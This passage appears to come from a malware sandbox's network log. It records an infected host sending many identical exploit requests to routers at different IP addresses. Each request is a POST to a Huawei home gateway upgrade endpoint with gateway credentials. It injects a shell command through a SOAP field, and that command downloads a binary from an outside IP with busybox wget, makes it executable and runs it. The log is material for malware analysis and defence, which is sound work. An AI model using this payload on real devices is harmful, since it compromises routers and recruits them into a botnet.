                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1500192.168.2.155317037.97.242.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643601894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1501192.168.2.155578694.90.252.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643601894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1502192.168.2.153784231.131.246.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643615007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1503192.168.2.1559822121.112.179.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643640995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1504192.168.2.1560570181.217.132.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643656015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1505192.168.2.1550292157.204.30.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643686056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1506192.168.2.1550900121.79.247.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643708944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1507192.168.2.1546588222.18.176.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643713951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1508192.168.2.155492445.189.206.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643740892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1509192.168.2.154145894.173.190.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643742085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
